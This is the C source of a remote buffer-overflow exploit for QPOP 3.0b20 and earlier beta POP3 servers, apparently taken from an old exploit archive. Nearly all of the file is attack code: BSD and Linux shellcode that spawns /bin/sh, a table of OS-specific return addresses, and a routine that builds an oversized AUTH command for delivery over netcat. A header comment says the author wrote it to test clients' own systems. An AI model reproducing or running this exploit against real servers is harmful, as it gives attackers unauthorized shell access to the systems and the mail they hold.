home *** CD-ROM | disk | FTP | other *** search
- /* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
- * combination *BSD and Linux
- *
- * sk8@lucid-solutions.com
- * http://www.lucid-solutions.com
- *
- * I have written this to test and demonstrate vulnerabilities on clients'
- * systems only.
- *
- * !!!!!!!!!!DO NOT distribute!!!!!!!!!!
- * (at least not until Qualcomm issues a patch)
- *
- * You may only use this to test your own system(s).
- * I am not responsible for any unauthorized use of this program.
- *
- * tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux
- *
- * Since popper is usually compiled by the admin, return addresses will vary,
- * but I have included common values. You may have to provide an offset
- * to get it to work on your system.
- *
- * I wrote the exploit near the beginning of November 1999, and unlike some
- * other exploits I've seen since, this one works even on Linux boxes on which
- * inetd was not started from a shell prompt.
- *
- * Usage: If you can't figure out how to use this, you shouldn't
- * be in the security business. (try netcat)
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <sys/time.h>
- #include <sys/types.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
-
- unsigned int NOP=0x90;
-
- unsigned long offset=0; /* default offset */
-
- char bsdsc[]=
- "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
- "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
- "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
- "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
- "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
- "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
-
- char linuxsc[]=
- "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
- "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
- "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
- "\xff\xff/bin/sh";
-
- struct version
- {
- int num;
- char* systype;
- int buffer_length;
- long address;
- };
-
- struct version verlist[] =
- {
- {
- 0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c
- },
- {1, "BSDI 4.x", 1001, 0x8047564},
- {2, "FreeBSD 3.x", 1001, 0xbfbfd3dc},
- {3, "Linux", 990, 0xbfffd304},
- {0, 0, 0, 0}
- };
-
- int main(int argc, char** argv)
- {
- char* buffer, *shellcode;
- int buflen, i=0, ver, retaddr, align=0;
- struct sockaddr_in sockaddr;
- struct hostent* host;
-
- if (argc < 2)
- {
- printf("Usage: %s version [offset]\n", argv[0]);
- i=-1;
- printf("\nAvailable versions:\n");
- while (verlist[++i].systype)
- {
- printf(" %d: %s\n", verlist[i].num, verlist[i].systype);
- }
- printf("\n");
- exit(-1);
- }
-
- ver=atoi(argv[1]);
- if (argc > 2)
- {
- offset=atoi(argv[2]);
- }
- if (strstr(verlist[ver].systype, "Linux"))
- {
- shellcode=linuxsc;
- align=2;
- }
- else shellcode=bsdsc;
-
- buflen=verlist[ver].buffer_length;
- retaddr=verlist[ver].address;
-
- buffer=(char*)malloc(buflen);
- memset(buffer, NOP, buflen);
- memcpy(buffer, "AUTH ", 5);
- memcpy(buffer+800, shellcode, strlen(shellcode));
- for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4)
- {
- *((unsigned long int *)&buffer[i])=retaddr+offset;
- }
- buffer[buflen-2]='\n';
- buffer[buflen-1]='\n';
-
- printf("%s\n", buffer);
- }
- /* www.hack.co.za [2000]*/
